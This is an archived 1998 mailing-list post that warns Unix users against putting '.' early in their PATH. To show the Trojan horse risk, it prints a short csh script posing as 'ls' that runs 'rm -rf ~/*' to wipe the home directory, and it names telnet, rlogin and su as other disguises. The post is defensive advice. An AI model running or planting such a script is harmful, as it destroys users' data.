`.' in your path (was Re: XForms: Color Problem with Xforms)

Steve Lamont (spl@szechuan.ucsd.edu)
Sat, 22 Aug 98 12:57:48 PDT

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: T.C. Zhao: "Re: XForms: using xforms and GL (Mesa)"
Previous message: Steve Lamont: "Re: XForms: Color Problem with Xforms"

# To subscribers of the xforms list from spl@szechuan.ucsd.edu (Steve Lamont) :

I have been taken to task by a member of this list regarding a recent
posting wherein I commented on having the advisability of naming test
programs `test' and the location of `.' in the execution path.

Taking the last and more important issue first, let me clarify by
stating that I strongly disrecommend having `.' as the first entry in
your path or, in fact, anywhere other than at the last entry.

In case anyone missed the point of my somewhat tongue in cheek "extra
credit question" let me strongly state that having `.' anywhere but
at the end of the path is a Bad Idea.

I said:
> Not that I necessarily recommend having `.' first in your path (for
> extra credit, consider *why* you don't want `.' first in your path --
> use the terms "Trojan horse" and "rm -rf ~/*" in your answer).

I'd think that was pretty clear, the implication being that evil
person could put an executable with the name of a common Unix command
somewhere where someone is likely to blunder, say `ls', which is a
shell script containing

#!/bin/csh -f

unset noglob
unalias rm

rm -rf ~/*

exit

for instance. Other obvious trojan horses would be `telnet',
`rlogin', or `su' (assuming that you're not sufficiently cautious
about using `su' to remember to type

/bin/su

when you want to become root).

If you're especially paranoid, you may wish to eliminate `.' from your
path altogether. This action is particularly recommended for the root
account.

Regarding the naming of test programs, I was assuming, first of all,
that any `test' program would be a throwaway and would not be hanging
around for very long.

In fact, I went on to say:

> Personally, I call all my throwaway programs `try' but your mileage
> may vary.

I hope this clarifies the point in case anyone on the list managed to
miss it.

spl
_________________________________________________
To unsubscribe, send the message "unsubscribe" to
xforms-request@bob.usuf2.usuhs.mil or see
http://bob.usuf2.usuhs.mil/mailserv/xforms.html
XForms Home Page: http://bragg.phys.uwm.edu/xforms
List Archive: http://bob.usuf2.usuhs.mil/mailserv/list-archives/

Next message: T.C. Zhao: "Re: XForms: using xforms and GL (Mesa)"
Previous message: Steve Lamont: "Re: XForms: Color Problem with Xforms"